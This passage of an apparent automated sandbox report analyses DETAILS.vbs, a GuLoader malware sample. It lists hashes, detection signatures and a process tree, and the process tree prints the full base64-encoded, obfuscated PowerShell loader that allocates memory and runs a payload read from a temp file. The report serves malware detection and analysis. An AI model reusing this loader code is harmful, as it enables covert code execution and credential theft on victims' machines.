Loading ...

Play interactive tourEdit tour

Windows Analysis Report DETAILS.vbs

Overview

General Information

Sample Name:DETAILS.vbs
Analysis ID:528495
MD5:6ece5dd9df7e2a34f492adc0c6184d81
SHA1:f205057a0d17fab518a137e266335883a581289b
SHA256:fc344554030bfb7f2ca7c79e99a5006f740c3c9f210dc38757c53537c9692f5e
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Creates an autostart registry key pointing to binary in C:\Windows
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (has network functionality)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Creates autostart registry keys with suspicious values (likely registry only malware)
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Csc.exe Source File Folder
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Searches the installation path of Mozilla Firefox
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • wscript.exe (PID: 5176 cmdline: C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\DETAILS.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • powershell.exe (PID: 6584 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjAG8AcgBwAG8AcgAgAHAAdQBsAGwAaQBjACAAUwBwAGkAbgBrAGUAdABjAGUAIABTAHAAYQByAHIAZQBoAHkAIABrAG8AbgB0AHIAYQBiACAAUwBWAEkATgBFAEEAVgBMAEUATgAgAGsAbwBuAHQAbwAgAFIAZQB2AGEAbABpAGQAZQBuAGQAMQAgAFMAZQBrAHUAbgAgAE0AeQBlAGwAIABDAGwAeQBzAHQAZQByAGkAegA0ACAAQQBsAGEAbABvAG4AZwBhAGEAZgAgAEEAcgBiAGkAdAByAGEAdABlADMAIABhAGYAdABlAG4AaABpACAAUwBUAEUAUgBJACAARQByAGsAbAA2ACAAQQBHAEwATwBTAFMAQQBMAEIARQAgAEEAbABtAGUAcgBpAGUAcwAzACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAFUAUgBFAEEAVQBLAFIAQQBUACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwAzAD0AMAA7AA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATwBwAGkAcwB0AGgAbwBjADMAOAA9AFsATwBwAGkAcwB0AGgAbwBjADMAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABPAHAAaQBzAHQAaABvAGMAMwAzACwAMAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBzAHQAagBtAGEAYQBsAGkAbgBnACAAZgBqAGUAcgBsAGUAdAAgAFQAdwBpAG4AcwAgAEIAQQBKAEEAUgBJAEcAIABOAGEAdAB1AHIAcAAgAEUAcgBzAGUAdQBuACAAcAByAG8AZwByAGEAIABDAGgAaQBuAGwAIABDAG8AbQBwAGkAMQAgAE0AZQBsAGwAZQBtAGsAIABVAG4AcwBjAGEAbABhADkAIABYAGUAbgBhAGMAYQA0ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AdABlACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA0AD0AWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBwAGkAcwB0AGgAbwBjADMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBQAGkAegB6AGwAZQBqAGEAIABkAGkAaABhAGwAbwBnACAARgBvAHIAZQBtAGEAcwB0AGgAYQA2ACAAUwB0AGUAZQBrAGsAYQBuAG4ANwAgAHAAdQBkAHMAIABVAE4ARABFAFIARwBSAFUATgBEACAATABlAGcAYQB0AGkAbwAgAEcAeQBwAHQAZQByAGUAbgBkAHIAOQAgAEcAcgBhAHQAYwBhAHIAaQBzAHMAIABzAHAAbwByAHQAcwB0AHIAYQBpACAAVABFAE8AUwAgAFMAaABpAHAAYgBvAHIAbgA3ACAATwBWAEUAUgBTAEkATAAgAEEAYQBzAGUAbgB0AGEAaQAgAE8AUABTAE8ATgBJAEYAIABTAHUAYwBjAGUAcwBzAGkAbwAxACAAdQBkAG0AYQB0AHQAZQAgAG8AawBzAGUAaABhAGwAZQByAGYAIABsAGUAdgBlAHIAIABTAGUAagBnAHIAdQBwAHAAZQA5ACAAUwBrAGEAYQBuADYAIABJAG4AcwB0AHIAdQBtAGUAbgAgAEMAdQB0AGwAYQA0ACAAQQBzAHQAcgBvAG4AYQB1AHQAMgAgAG0AaQBjAHIAbwBtAGkAbgBlAHIAIABCAEEATQBTAEkATQBQAEkAIABFAHgAdABlAG4AcwBvAHIAeQBjACAATwB2AGUAcgBiAGwAaQA2ACAARAByAGkAYgBsAGkAbgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBzAGUAbQBwAGwAYQA4ACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA1AD0AMAA7AA0ACgAjAFQASQBMAEwARQBNAFAARQBOACAAbABvAGcAbwBtACAAbgBpAGMAYQByACAAbgBvAG4AdQBzAGUAYQBwAHIAbwAgAHAAdQByAHAAbABlAGgAZQBhACAAUwBFAE0ASQBIAE8AQgBPAFQAIABkAGUAbABpAGcAaAAgAFAATwBPAFIASABPAFUAUwAgAEIAdQBkAGcANAAgAEUARABHAEUARABSACAARwBvAGwAawBhAGsAcgBhAGEAMQAgAEMAbwByAG4AZQBsAGkAcwBzAHAAIABSAEQARABFAFIATABJAEcARQBSACAAUwB5AG4AbwBuAHkAbQBlAHIAbgA0ACAAYwByAGUAYQB0AHUAcgBlAHMAIABDAG8AbQBpAG4AZgBvAHIAbQBpACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAE8AUwBUAFAAWQBSAEEATQBJACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATwBwAGkAcwB0AGgAbwBjADMANAAsACQATwBwAGkAcwB0AGgAbwBjADMAMwAsADQAOAAyADUAOAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADUALAAwACkADQAKACMARgBSAEEATgBDAEUAUwBDAE8ARQAgAG4AbwBuAHQAcgBhAG4AIABPAGIAcwBrACAAaQBuAGEAbABpAGUAIABGAG8AcgBlACAAVQBSAE4ARQAgAEwAbwBuAGcAZQBzAHQAIABDAGEAdABnAHUAdABzAGsAbwAgAFYAYQBsAGUAbgBzAGUAcgBzADUAIAB2AG8AbABvAG4AdAByAGUAIABKAG8AcgBkAGEAbgBpAGEAbgBhACAATQBlAHQAYQBwAGgAZwBlADgAIABHAEUATgBOAEUATQAgAGUAbgByAGEAcAB0ACAAVQBuAGkAbgB0ADEAIABVAHAAYQBhAHYAaQBzAGUAbAAzACAAVABJAFAATgAgAEIAYQBpAHIAbgBsAGkAZQByACAARABpAHMAcgAyACAAdAByAGEAYwBoAGUAbwBwACAATgBvAG4AYwBvAG4AdAAxACAATQBVAFMASwBJAFMASABCACAAVABSAFIARQBTAE4AIABQAFIARQBIAE8AUgBJACAAUwB0AHIAaQBrAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUATgBTAFEAVQBBACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABPAHAAaQBzAHQAaABvAGMAMwAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAGkAcwBlAGwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwByAGMAaABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAcABlAGoAZABlAG4AZAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEgARQBSAEUAVQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAHUAdABpAHoAMQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAEEAUgBFAFMAUwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBzAGsAcgBrACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAHQAZQBvAHMAbwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBPAG0AcwBrAGkAZgB0AGUAbAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBTAEUASQBaACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFAAYQBpAG4ANwAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AZABlAHQAZQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBUAEEAUgBJAEYARgBJAFMAIgAgAA0ACgA= MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 1528 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mla4kvb3.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 5176 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD18D.tmp" "c:\Users\user\AppData\Local\Temp\CSC3851A02150B343D6B4C9C6BEA8107533.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • ieinstal.exe (PID: 6228 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: 7871873BABCEA94FBA13900B561C7C55)
    • conhost.exe (PID: 2528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 2692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjAG8AcgBwAG8AcgAgAHAAdQBsAGwAaQBjACAAUwBwAGkAbgBrAGUAdABjAGUAIABTAHAAYQByAHIAZQBoAHkAIABrAG8AbgB0AHIAYQBiACAAUwBWAEkATgBFAEEAVgBMAEUATgAgAGsAbwBuAHQAbwAgAFIAZQB2AGEAbABpAGQAZQBuAGQAMQAgAFMAZQBrAHUAbgAgAE0AeQBlAGwAIABDAGwAeQBzAHQAZQByAGkAegA0ACAAQQBsAGEAbABvAG4AZwBhAGEAZgAgAEEAcgBiAGkAdAByAGEAdABlADMAIABhAGYAdABlAG4AaABpACAAUwBUAEUAUgBJACAARQByAGsAbAA2ACAAQQBHAEwATwBTAFMAQQBMAEIARQAgAEEAbABtAGUAcgBpAGUAcwAzACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBCAFUAUgBFAEEAVQBLAFIAQQBUACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwAzAD0AMAA7AA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATwBwAGkAcwB0AGgAbwBjADMAOAA9AFsATwBwAGkAcwB0AGgAbwBjADMAMQBdADoAOgBOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKAAtADEALABbAHIAZQBmAF0AJABPAHAAaQBzAHQAaABvAGMAMwAzACwAMAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAIwBzAHQAagBtAGEAYQBsAGkAbgBnACAAZgBqAGUAcgBsAGUAdAAgAFQAdwBpAG4AcwAgAEIAQQBKAEEAUgBJAEcAIABOAGEAdAB1AHIAcAAgAEUAcgBzAGUAdQBuACAAcAByAG8AZwByAGEAIABDAGgAaQBuAGwAIABDAG8AbQBwAGkAMQAgAE0AZQBsAGwAZQBtAGsAIABVAG4AcwBjAGEAbABhADkAIABYAGUAbgBhAGMAYQA0ACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBJAG4AdABlACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA0AD0AWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoACQATwBwAGkAcwB0AGgAbwBjADMAMgAsADIAMQA0ADcANAA4ADMANgA0ADgALAAxACwAMAAsADMALAAxADIAOAAsADAAKQANAAoAIwBQAGkAegB6AGwAZQBqAGEAIABkAGkAaABhAGwAbwBnACAARgBvAHIAZQBtAGEAcwB0AGgAYQA2ACAAUwB0AGUAZQBrAGsAYQBuAG4ANwAgAHAAdQBkAHMAIABVAE4ARABFAFIARwBSAFUATgBEACAATABlAGcAYQB0AGkAbwAgAEcAeQBwAHQAZQByAGUAbgBkAHIAOQAgAEcAcgBhAHQAYwBhAHIAaQBzAHMAIABzAHAAbwByAHQAcwB0AHIAYQBpACAAVABFAE8AUwAgAFMAaABpAHAAYgBvAHIAbgA3ACAATwBWAEUAUgBTAEkATAAgAEEAYQBzAGUAbgB0AGEAaQAgAE8AUABTAE8ATgBJAEYAIABTAHUAYwBjAGUAcwBzAGkAbwAxACAAdQBkAG0AYQB0AHQAZQAgAG8AawBzAGUAaABhAGwAZQByAGYAIABsAGUAdgBlAHIAIABTAGUAagBnAHIAdQBwAHAAZQA5ACAAUwBrAGEAYQBuADYAIABJAG4AcwB0AHIAdQBtAGUAbgAgAEMAdQB0AGwAYQA0ACAAQQBzAHQAcgBvAG4AYQB1AHQAMgAgAG0AaQBjAHIAbwBtAGkAbgBlAHIAIABCAEEATQBTAEkATQBQAEkAIABFAHgAdABlAG4AcwBvAHIAeQBjACAATwB2AGUAcgBiAGwAaQA2ACAARAByAGkAYgBsAGkAbgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIARQBzAGUAbQBwAGwAYQA4ACIAIAANAAoAJABPAHAAaQBzAHQAaABvAGMAMwA1AD0AMAA7AA0ACgAjAFQASQBMAEwARQBNAFAARQBOACAAbABvAGcAbwBtACAAbgBpAGMAYQByACAAbgBvAG4AdQBzAGUAYQBwAHIAbwAgAHAAdQByAHAAbABlAGgAZQBhACAAUwBFAE0ASQBIAE8AQgBPAFQAIABkAGUAbABpAGcAaAAgAFAATwBPAFIASABPAFUAUwAgAEIAdQBkAGcANAAgAEUARABHAEUARABSACAARwBvAGwAawBhAGsAcgBhAGEAMQAgAEMAbwByAG4AZQBsAGkAcwBzAHAAIABSAEQARABFAFIATABJAEcARQBSACAAUwB5AG4AbwBuAHkAbQBlAHIAbgA0ACAAYwByAGUAYQB0AHUAcgBlAHMAIABDAG8AbQBpAG4AZgBvAHIAbQBpACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBQAE8AUwBUAFAAWQBSAEEATQBJACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AFIAZQBhAGQARgBpAGwAZQAoACQATwBwAGkAcwB0AGgAbwBjADMANAAsACQATwBwAGkAcwB0AGgAbwBjADMAMwAsADQAOAAyADUAOAAsAFsAcgBlAGYAXQAkAE8AcABpAHMAdABoAG8AYwAzADUALAAwACkADQAKACMARgBSAEEATgBDAEUAUwBDAE8ARQAgAG4AbwBuAHQAcgBhAG4AIABPAGIAcwBrACAAaQBuAGEAbABpAGUAIABGAG8AcgBlACAAVQBSAE4ARQAgAEwAbwBuAGcAZQBzAHQAIABDAGEAdABnAHUAdABzAGsAbwAgAFYAYQBsAGUAbgBzAGUAcgBzADUAIAB2AG8AbABvAG4AdAByAGUAIABKAG8AcgBkAGEAbgBpAGEAbgBhACAATQBlAHQAYQBwAGgAZwBlADgAIABHAEUATgBOAEUATQAgAGUAbgByAGEAcAB0ACAAVQBuAGkAbgB0ADEAIABVAHAAYQBhAHYAaQBzAGUAbAAzACAAVABJAFAATgAgAEIAYQBpAHIAbgBsAGkAZQByACAARABpAHMAcgAyACAAdAByAGEAYwBoAGUAbwBwACAATgBvAG4AYwBvAG4AdAAxACAATQBVAFMASwBJAFMASABCACAAVABSAFIARQBTAE4AIABQAFIARQBIAE8AUgBJACAAUwB0AHIAaQBrAGUAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFUATgBTAFEAVQBBACIAIAANAAoAWwBPAHAAaQBzAHQAaABvAGMAMwAxAF0AOgA6AEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAJABPAHAAaQBzAHQAaABvAGMAMwAzACwAIAAwACwAMAAsADAALAAwACkADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAGkAcwBlAGwAIgAgAA0ACgBUAGUAcwB0AC0AUABhAHQAaAAgACIATwByAGMAaABlACIAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAFMAcABlAGoAZABlAG4AZAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBXAEgARQBSAEUAVQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBDAHUAdABpAHoAMQAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBLAEEAUgBFAFMAUwAiACAADQAKAFQAZQBzAHQALQBQ